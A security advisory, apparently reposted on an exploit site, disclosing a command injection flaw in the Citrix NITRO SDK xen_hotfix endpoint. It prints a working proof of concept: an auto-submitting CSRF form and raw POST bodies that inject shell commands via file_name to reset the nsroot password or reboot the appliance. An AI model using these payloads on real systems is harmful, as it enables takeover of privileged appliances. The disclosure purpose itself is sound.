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zdtHan Sahin1337DAY-ID-23413
HistoryMar 20, 2015 - 12:00 a.m.

Citrix NITRO SDK - Command Injection Vulnerability

2015-03-2000:00:00
Han Sahin
0day.today
29

A command injection vulnerability in Citrix NITRO SDK’s xen_hotfix page was discovered. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance along with all underlying applications and data.

Abstract
 
 
Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
 
Tested version
 
 
This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected.
 
Fix
 
 
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc.
 
Introduction
 
 
The Citrix NetScaler SDX platform delivers fully isolated NetScaler instances running on a single appliance. Each instance is a full-blown NetScaler environment, which optimizes delivery of applications over the Internet and private networks. The NITRO SDK allows you to configure and monitor the NetScaler appliance programmatically. NITRO exposes its functionality through REST interfaces. A Cross-Site Scripting vulnerability was found in one of the REST services exposed by the NITRO SDK.
 
Administrators can upload XenServer hotfixes to the Citrix SDX appliance. The REST interface responsible for handling these hotfixes is vulnerable to command injection.
 
Details
 
 
This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.
 
The following proof of concept can be used to exploit this issue;
<html>
   <body>
      <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST">
         <input type="hidden" name="object" value="&#123;"params"&#58;&#123;"action"&#58;"start"&#125;&#44;"xen&#95;hotfix"&#58;&#91;&#123;"file&#95;name"&#58;"&#46;&#46;&#47;&#46;&#46;&#47;etc&#47;passwd&#59;echo&#32;nsroot&#58;Securify&#124;chpasswd&#59;"&#125;&#93;&#125;" />
         <input type="submit" value="Submit request" />
      </form>
      <script>document.forms[0].submit();</script>
   </body>
</html>
 
 
 
POST /nitro/v1/config/xen_hotfix HTTP/1.1
-----------------------------------------
 
object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}
 
or
 
object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]}
 
 
Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page.

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